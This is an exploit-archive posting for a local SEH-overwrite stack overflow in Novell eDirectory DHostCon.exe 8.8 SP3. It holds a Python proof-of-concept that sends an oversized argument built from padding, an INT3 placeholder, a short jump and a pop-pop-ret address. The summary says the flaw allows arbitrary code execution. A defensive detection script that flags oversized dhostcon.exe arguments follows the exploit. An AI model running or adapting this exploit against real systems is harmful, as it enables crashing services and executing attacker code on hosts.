Novell eDirectory DHost Console 8.8 SP3 SEH Overwrite

Posted Oct 17, 2010
Authored by d0lc3

Novell eDirectory DHost Console version 8.8 SP3 SEH overwrite denial of service exploit.

tags | exploit, denial of service
MD5 | a9db2612e917d0696e56026f0887dc14

# Exploit Title:    Novell eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date: 17/10/2010
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.novell.com/
# Version: 8.8 SP3 (20216.67)
# Tested on: win32 xp sp3 (spa)

#Summary:
# DHostCon.exe is prone to a local denial of service caused by a stack overflow
# that is triggered if user-supplied parameters are too long (1074 bytes).
# Due to the nature of this vulnerability, attackers could exploit this issue
# to execute arbitrary code on the local host.

#PoC:

#!/usr/bin/python
# Python 2 script: str values and struct.pack() output are concatenated as byte strings
import os,struct

def main():
    path=r"C:\Novell\NDS\dhostcon.exe" #raw string keeps the backslashes literal
    args="x.x.x.x" #ip server
    buf="A"*1065
    nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP
    seh=struct.pack("<L",0x61012c20) #PPR dclient.dll

    shellcode=struct.pack("<B",0xCC) #INT3

    crash=buf+shellcode+nseh+seh

    os.system(path+" "+args+" "+crash) #Crash!

if __name__=="__main__":
    main()
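
Detection logic for the condition described in the summary, added here as an example and not part of the original posting: it flags process-creation records in which dhostcon.exe is started with an argument at or above the 1074 bytes the advisory cites. The event field names (`host`, `command_line`), the sample records, and applying the limit to each argument separately are assumptions.

```python
import ntpath

# Argument length at which the advisory reports the overflow (figure from the page).
OVERFLOW_LEN = 1074
TARGET_IMAGE = "dhostcon.exe"

def split_cmdline(cmdline):
    """Split a Windows command line into tokens, honouring double quotes only."""
    tokens, cur, in_quotes = [], "", False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append(cur)
                cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens

def oversized_dhostcon_args(events, limit=OVERFLOW_LEN):
    """Return (host, longest_arg_len) for dhostcon.exe launches with an argument >= limit."""
    hits = []
    for ev in events:
        tokens = split_cmdline(ev["command_line"])
        if not tokens:
            continue
        # Match on the image file name only, case-insensitively, whatever the install path.
        if ntpath.basename(tokens[0]).lower() != TARGET_IMAGE:
            continue
        longest = max((len(t) for t in tokens[1:]), default=0)
        if longest >= limit:
            hits.append((ev["host"], longest))
    return hits

# Constructed sample events (not real logs), shaped like process-creation records.
SAMPLE_EVENTS = [
    {"host": "ws-01", "command_line": r'C:\Novell\NDS\dhostcon.exe 10.0.0.5'},
    {"host": "ws-02", "command_line": r'"C:\Novell\NDS\dhostcon.exe" 10.0.0.5 ' + "B" * 1074},
    {"host": "ws-03", "command_line": r'C:\Windows\System32\ping.exe ' + "B" * 2000},
    {"host": "ws-04", "command_line": r'c:\novell\nds\DHOSTCON.EXE 10.0.0.5 ' + "B" * 1073},
]

if __name__ == "__main__":
    for host, n in oversized_dhostcon_args(SAMPLE_EVENTS):
        print(f"{host}: dhostcon.exe launched with a {n}-character argument")
```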
